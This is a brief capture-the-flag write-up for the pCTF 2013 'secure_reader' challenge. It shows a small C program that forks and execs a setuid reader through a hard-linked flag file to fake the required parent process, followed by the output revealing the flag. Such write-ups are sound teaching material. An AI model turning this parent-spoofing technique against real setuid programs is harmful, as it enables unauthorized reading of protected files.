04
May
2013

pCTF 2013 – secure_reader (pwn 150)

I can’t figure out how to read the flag πŸ™ ssh to 54.224.109.162

The secure_reader program can read the flag, but can only be invoked from the reader program.

team9@securereader:~$ ls -la /home/securereader/
total 1476
drwxr-xr-x    2 root         root   4096 Apr 19 18:56 .
drwxr-xr-x 1004 root         root  24576 Apr 19 18:53 ..
-r--------    1 securereader root     29 Apr 19 18:56 flag
-r-xr-xr-x    1 root         root 739695 Apr 19 12:49 reader
-r-sr-xr-x    1 securereader root 734666 Apr 19 12:49 secure_reader

Additionally, the secure_reader will not read the flag from /home/securereader/flag. Somebody already made a hard link in /tmp:

team9@securereader:~$ ls -alh /tmp/flag
-r-------- 6 securereader root 29 Apr 19 18:56 /tmp/flag

Now, to fake the invocation, we just perform a fork, have the child execute secure_reader and the parent execute reader with a big file which takes a while to run:

test.c:

#include <unistd.h>
int main() {
        int child;
        child = fork();
        if (child == 0) {
                sleep(1);
                execl("/home/securereader/secure_reader", "secure_reader", "/tmp/flag", NULL);
        } else {
                execl("/home/securereader/reader", "reader.elf", "/tmp/blablabla/bigfile", NULL);
        }
}

Result:

team9@securereader:~$ ./test
that_was_totally_a_good_idea
^C
team9@securereader:~$ ^C

Comments are closed.